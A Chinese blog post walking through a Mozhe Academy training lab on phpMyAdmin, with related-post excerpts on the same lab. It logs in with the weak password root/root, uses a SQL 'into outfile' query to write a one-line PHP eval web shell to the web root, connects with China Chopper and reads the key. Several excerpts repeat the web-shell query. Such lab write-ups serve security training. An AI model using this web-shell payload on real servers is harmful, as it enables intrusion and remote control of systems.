墨者学院---phpMyAdmin后台文件包含分析溯源--解题思路

最新推荐文章于 2023-12-12 00:52:29 发布
最新推荐文章于 2023-12-12 00:52:29 发布
阅读量434 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/108252458
版权
  1. 进入后台,使用弱口令尝试登入
    如admin~admin,root-root等
    本题为root-root

在这里插入图片描述

点到SQL,发现可以进行sql语句

在这里插入图片描述

select ‘<?php eval($_POST[giao]);?>’ into outfile ‘/var/www/html/2.php’
3.执行成功
在这里插入图片描述

4.上菜刀
在这里插入图片描述

5.在根目录可以找到本题所需要的key

在这里插入图片描述
在www/html目录中可以找到写入的一句话木马

Lin冲啊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院-phpMyAdmin后台文件包含分析溯源
qq_47094508的博客
07-01 1298
首先拿到题目到点击访问访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器账户密码:root root点击sql模块 对sql语句进行一个查询首先查询sql写一句话的权限我们可以看到他的值为空secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/ 接下来确认一下mysql权限,可以看到这里是最高权限r
墨者学院——phpMyAdmin后台文件包含分析溯源
知足且坚定,温柔且上进
02-09 520
此题利用一句话木马 进入登陆界面,用burpsuite爆破得到username与password都为:root 进入SQL界面,输入一句话木马(密码为leo),点击“执行”: select "<?php eval($_post[leo]);?>" into outfile "/var/www/html/3.php" 此时打开蚁剑(注意:url后面记得跟上一句话木马目标的页面3....
墨者学院10 phpMyAdmin后台文件包含分析溯源
weixin_42789937的博客
02-12 487
墨者学院10 phpMyAdmin后台文件包含分析溯源,本文整理了评论区的三种解法,解题过程七分靠技术,三分靠运气~
墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)
kitiu666的博客
01-26 1319
2021年1月26日,第六次渗透测试。 实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干! 准备需求: 1、win10系统; 2、中国菜刀; 1、进入靶场 账号:root 密码:root 这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟); 2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行; select ‘<?php eval($_POST[key
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者】靶场练习——phpMyAdmin后台文件包含分析溯源
weixin_63082823的博客
12-12 551
首先我们启动靶场,点击访问就会跳转到phpMyAdmin的登陆页面,我们使用弱口令root,root登录。
phpMyAdmin后台文件包含分析溯源
qq_36933272的博客
09-01 156
使用弱口令root/root登陆 点击SQL,进行sql注入一句话木马,执行 select’<?php @eval($_POST[pass])?>;’ into outfile ‘/var/www/html/1.php’ 使用菜刀连接,在根目录得到key ...
0x01.phpMyAdmin后台文件包含分析溯源
qq_31679787的博客
09-11 952
登录界面; phpmyadmin的默认账户名密码是root/空,或者是root/root,尝试后发现是root/root; 通过打开新的phpmyadmin窗口,发现所有参数; 根据cve-2018-12613漏洞可以得到网站根目录/var/www/html; 首先select '<?php phpinfo();?>';然后通过payload构造文件包含; payl...
墨者学院_phpMyAdmin后台文件包含分析溯源
cc_de_csdn的博客
08-22 2516
墨者学院_phpMyAdmin后台文件包含分析溯源 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响 前台可以使用弱口令直接登录...
墨者学院-日志文件分析溯源(Google蜘蛛)
qq_37850901的博客
09-27 283
根据题意,搜索谷歌爬虫的ip,在日志中ctrl+f尝试搜索bot 或google,结果中出现了这个 验证ip得到key
phpmyadmin文件包含
rede
04-22 433
phpmyadmin文件包含 CVE-2018-12613 — 本地文件包含造成远程代码执行漏洞复现,其实就是我们常见的LFI漏洞。在我前面写的博客里面又详细介绍。这次我们直接进入墨者学院进行复现,不再自行搭建环境。 进入环境 这里使用弱口令进入,账号root,密码root。 进入之后页面如下: 执行sql语句挂入一句话木马 进入SQL执行页面 点击执行。 使用中国菜刀连接服务器 在根...
墨者学院 - PHP本地包含漏洞代码溯源
多崎巡礼的博客
09-25 719
  根据r.php源码构造本地文件读取url:/r.php?p=../../../../../../../the_key_is_here done
墨者学院PHP本地包含漏洞代码溯源
liangzi321321的博客
09-03 467
打开靶场显示的是一个看似普通的网页,查看网页源码,发现有一些注释 <!--r.php文件源码如下 本关通关key保存在系统根目录the_key_is_here.txt中 -> <?php $p=($_GET["p"].".txt"); $pics=file($p); for($i=0;$i< count($pics);$i++) { echo $pics[$i]; ...
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源
qq_43233085的博客
01-13 803
墨者靶场 入门:phpMyAdmin后台文件包含分析溯源题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 实训目标 1、了解此漏洞形成的原因; 2、掌握此漏洞的利用方式。 解题方向 根据漏洞编号找到相关知识。 解题步骤 启动靶场...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,攻击者可能会尝试利用X-F字段进行SQL注入攻击。为了防止SQL注入攻击,开发人员应该合理地验证和过滤用户输入,并使用参数化查询或预编译语句来防止SQL注入攻击。此外,最好避免将用户输入直接拼接到SQL查询中。墨者学院可能提供相关的课程或教程来帮助开发人员学习和理解如何防止SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值